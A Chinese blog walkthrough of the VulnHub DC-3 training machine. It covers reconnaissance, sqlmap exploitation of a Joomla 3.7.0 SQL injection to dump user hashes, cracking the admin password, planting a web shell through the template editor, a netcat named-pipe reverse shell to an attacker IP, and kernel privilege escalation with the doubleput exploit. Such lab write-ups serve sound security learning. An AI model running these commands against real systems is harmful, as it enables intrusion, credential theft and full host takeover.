vulnhub靶机试炼场之DC-3

最新推荐文章于 2024-04-15 00:13:28 发布
最新推荐文章于 2024-04-15 00:13:28 发布
阅读量2.4k 收藏 2
点赞数
分类专栏: 渗透 靶机 复现 文章标签: 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mrs_H/article/details/122323055
版权
复现 同时被 3 个专栏收录
31 篇文章 3 订阅
订阅专栏
渗透
3 篇文章 0 订阅
订阅专栏
靶机
1 篇文章 0 订阅
订阅专栏

DC-3靶机渗透实战

一.前言

关于这次的靶机渗透文章我已经托更很久了,一直都没有时间来好好看一下这个靶机。最近也是到了放假的时候,也会陆续的把之前期末复习期间欠下的东西好好回顾一下。在上个月里也没有好好的看过靶场里面的题目,这个月打算趁年前把ssrf的坑填了,顺便也想把文件上传这方面的靶场习题开个坑,以前只有在打比赛的时候才会着重看的漏洞就是文件上传,关于其中的奇技淫巧还有着太多不熟悉的地方,有时间要好好看一下了。

二.正文

这次的靶机只有一个flag所以这次就不以flag的先后顺序做时间线了,就以渗透的步骤做索引吧。

1.信息搜集阶段

首先,我们还是按照往常那样,用arp-scan来扫描整个网段。
arp-scan -l
在这里插入图片描述
从上面的图中我们可以分析出10.122.213.229就是我们要寻找的目标靶机。所以,我们启用nmap对改靶机进行全端口扫描。
nmap -sV -p- 10.122.213.229
在这里插入图片描述
我们直接去访问它的网站。
在这里插入图片描述
我们看到这个网站是用joomla搭建的,所以我们这里直接选用joomscan对其进行扫描。
joomscan -u 192.168.1.4(这里是复现的环境,所以ip地址会有差别)
请添加图片描述
我们发现这个框架的版本是joomla 3.7.0
我们直接使用searchsploit去寻找一下这个版本的漏洞。
在这里插入图片描述
joomla3.7有一个sql注入的漏洞,我们去看一下这个漏洞的说明文档。
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
在这里插入图片描述
这个说明文档直接让我们用sqlmap去跑这个数据库,我们接下来构造命令,用sqlmap来跑。

2.漏洞利用

在终端中输入如下命令
sqlmap -u "http://192.168.1.4/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
在这里插入图片描述
我们在得到数据库的名称之后,我们着重对这个joomladb进行爆破。
我们接着爆表名。
sqlmap -u "http://192.168.1.4/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
在这里插入图片描述
然后对这些表中的#__users表进行字段名的爆破,输入如下命令
sqlmap -u "http://192.168.1.4/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]
在这里插入图片描述
对上面这些字段中我们最关心的就是username还有password了,所以接着用sqlmap来跑其中的字段值。
sqlmap -u "http://192.168.1.4/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C "name,password" --dump -p list[fullordering]
在这里插入图片描述
我们拿到了一个名为admin的用户的密码hash值。这道题不像之前的题目一样可以通过改表来实现,所以这里直接用john来进行爆破。将上述mimadehash装进一个文件,然后用john进行爆破
john pass//pass就是文件名
在这里插入图片描述
我们很快就爆出来了admin用户的密码,密码是snoopy。
我们在之前的joomscan扫描过程中曾扫出来一个后台登陆界面,也就是administrator界面,我们尝试用该用户名密码进行登录。
在这里插入图片描述
成功登录进去后,我们开始寻找可以利用的点,最终我们在templates下面找到一个可以创建文件并且可以写文件的地方。于是,尝试写入一句话木马
在这里插入图片描述
然后按照路径进行连接。
在这里插入图片描述
接着我们用蚁剑的虚拟终端进行下一步的操作
在这里插入图片描述
因为在蚁剑上并不能完全发挥我们的“渗透”技能,所以用蚁剑特有的方式把shell弹到我们的kali上。
我们要先在kali上监听一个端口(就是你弹的端口),然后在蚁剑命令行上面输入如下的命令
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.85.139 9000 >/tmp/f
然后我们就可以在kali端的命令行中收到目标主机的shell
在这里插入图片描述
然后我们用最常见的方式,把这个shell变成交互式的。
python -c 'import pty;pty.spawn("/bin/bash")'
在这里插入图片描述
3.本地提权
我们拿到了目标机器的shell,但是只可惜不是root的权限。所以我们接下来进行提权的操作。在之前的靶机渗透过程中我们利用的是suid进行提权但是在这道题中并不能很好的适用。所以接下来,我们来利用系统内核漏洞进行提权。
首先查看当前机器的系统内核版本情况。
cat /proc/versioncat /etc/issueuname -a
用上面这三个命令来查一下这个系统的基本情况。
在这里插入图片描述
还是去searchsploit里面进行搜索Ubuntu 16.
在这里插入图片描述
找到一个对于Linux内核4.4.x版本的漏洞利用。所以,我们来看一下其中的内容
在这里插入图片描述
我们先去下载39772.zip然后将其解压得到一个exploit.tar。然后我们cd进39772目录然后用python开启一个简单的网络服务。
python -m SimpleHTTPServer 10001
在这里插入图片描述
然后在目标机器上的shell中用wget来获取解压后的exploit文件。

在这里插入图片描述
然后在目标靶机的shell上面用漏洞利用说明文档里面写的那样一步一步照做就行了。
先解压tar xvf exploit.tar
然后cd ebpf_mapfd_doubleput_exploit
在这里插入图片描述
进行编译./compile.sh
然后提权./doubleput
在这里插入图片描述
最后我们来到root目录下面就能得到flag了
在这里插入图片描述

三.后记

最近买了本关于web方面的书籍,准备抽点时间拿来看看。一直都是自己漫无目的地去学这些东西也是时候去看一些书系统性的了解一下里面的内容了。

入山梵行
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机dc-3
m0_52328368的博客
08-14 1275
dc-3靶机教程
Vulnhub系列】DC3
大方子
04-08 5067
文章目录基本信息实验过程额外补充利用php反弹shell使用Linux-Exploit-suggestion来辅助提权 靶机下载地址:https://download.vulnhub.com/dc/DC-3-2.zip 基本信息 Kali:192.168.61.145 DC3:192.168.61.163 实验过程 同样先通过arpscan扫描找出DC3的IP地址 sudo arp-scan --interface eth0 192.168.61.1/24 这里可以直接看出DC3的IP地址为192.1
Vulnhub 靶机实战系列 DC-3靶机
最新发布
rumil的博客
04-15 651
发现网站管理后台等信息,结合浏览器插件发现使用joomla CMS,使用kali当中jooscn工具进行扫描,如果没有安装即可。点击新建文件即可,在html/处新建php文件,也可上传,但是不一定成功,可以创建文件后将代码复制进去。根据前面信息收集到的内容,采用得CMS和版本信息,进行漏洞搜索,是否有可利用的漏洞。根据漏洞信息,进行漏洞利用,查看一下文件内容,尝试利用,sqlmap爆数据库。找上传点,或者可以查看代码或可执行代码的地方,找到扩展处功能处,尝试。发现有at,可以尝试提权,但是未果。
vulnhub-DC3
weixin_55129870的博客
05-15 475
开机出现错误,解决方法。趁着更改网络连接方式为nat模式。 开启kali.探测主机存活 nmap -sP 192.168.44.0/24 DC3IP: 192.168.44.143 扫描主机开放服务 nmap -A 192.168.44.143 -p 1-65535 只开放80端口,直接浏览器访问 指纹识别 whatweb http://192.168.44.143/ 结果显示使用apache平台,...
vulnhub靶机DC-3
travelnight的博客
03-10 4828
原知识星球老文搬运 拿到靶机之后导入到virtualBOX里面。 1. nmap扫描主机存活,192.168.56.104 有个80端口,不放心的话可以用masscan。 2. 直接访问看下,这里提示只有一个flag,直接拿到root权限。 3. 习惯性的上一下dirbuster。发现访问到不存在的URL时候服务器也是返回200OK,这个扫描就没有什么参考价值了。 4.御剑扫描一下,发现后台页面。这个是joomlaCMS 5.参考了下知乎的这个joomla渗透,https
Vulnhub DC-3
Pai_Space
02-15 250
192.168.37.132 This time, there is only one flag, one entry point and no clues. To get the flag, you'll obviously have to gain root privileges. How you get to be root is up to you - and, obviously, the system. Good luck - and I hope you enjo...
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
VulnHub DC3
baynk的博客
05-16 274
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-32,312/ 下载地址2 dc-3.2:https://pan.baidu.com/s/1LyKZbgQiQsSqpMlY8kNUBw 提取码: z4pv 下载地址3 dc-3:https://pan.baidu.com/s/1lt3ek4ra2jHbR4HVEyrk7g 提取码: j8cg 只有一个flag了,同时也只有一个切入点,而且官网上DC3好像升到了DC3-2,不知道到和以前的区别大不大,我这里就
VulnHubDC-3
qq_45434762的博客
03-23 460
一个粗糙的信息收集通过扫描端口信息,我们看到服务器只开放了一个80端口,运行的是Joomla框架我们打开网站看看在首页提示我们,这个靶机只有一个Flag,并且没有任何线索使用dirb扫...
vulnhubdc3
qq_54030686的博客
06-08 259
各位师傅可直接移步至 查看此篇即可,本人只当做笔记,以理清逻辑关系 主机发现 nmap -sS 192.168.2.0/24 发现测试靶机的ip为192.168.2.107,进行端口扫描 发现仅80端口开放进行指纹识别 发现网站使用的框架为joomla,使用专属的joomlascan进行检测, (中途更改了下环境,现在目标为192.168.43.131,本机ip为192.168.4.128) 打开相应界面 使用joomlascan进行检测 并未检测到相关漏洞,但检测到了后台路径和joomla 3.7版本,谷
Vulnhub靶机 DC-3
菜浪马废的博客
03-20 391
扫描ip 找到靶机192.168.0.131 发现开放80端口 必须访问一下啊 这个样子的,没啥信息 上插件 wappalyzer 火狐的指纹信息插件 nmap也扫了一下 实锤了,Joomla的cms 那肯定要用配套的joomscan扫一下啊 没事就扫一扫,扫扫更健康 没安装,先装一下 apt-get install joomscan 安装命令 看见版本号了,3.7.0,还有后台...
vulnhub渗透测试靶机DC-3
weixin_46128614的博客
01-11 786
靶机下载:https://www.vulnhub.com/entry/dc-3,312/ nmap 扫描只有一个80端口 直接访问 没有过多提示 用dirb跑发现了后台登录页面 是一个joomld搭的开源站 没有验证码 尝试爆破管理员密码 bp发现是snoopy 进入后台 找到template页面 编辑一个php文件 提醒:此处用的是冰蝎shell。msf的shell无法连上,system(...
vulnhubDC3靶机
LainWith的博客
08-11 2032
靶机概览信息收集nmap信息收集网站信息收集查找漏洞漏洞描述渗透攻击SQL注入攻击获取当前数据库的名字获取当前数据库的表名获取指定数据库的字段名获取目标字段密码破解getshell寻找上传点 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-3,312/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以.
Vulnhub系列_DC-3
weixin_41064688的博客
01-10 844
Vulnhub系列_DC-3 DC系列下载地址:https://download.vulnhub.com/dc/或http://www.five86.com/downloads.html 工具和漏洞: Netdiscover:进行网络发现 Nmap:端口扫描 Whatweb: 识别靶机网址使用的web服务、系统版本、CMS系统等 Joomscan: 扫描Joomla相关配置内容、检测已知漏洞等 S...
Vulnhub靶机渗透测试——DC-3
Cobra的博客
04-26 3341
一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu16.04): 192.168.189.182 靶机下载地址:DC: 3.2 ~ VulnHub 二、信息收集 1、使用nmap扫描存活主机 2、发现IP192.168.189.182开放80端口,再对其进行nmap扫描 nmap -sV -A -T4 192.168.189.182 3、通过扫描结果我们发现其指纹信息为joomla,访问其80端口 4、使用dirsearch对其进行目.
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值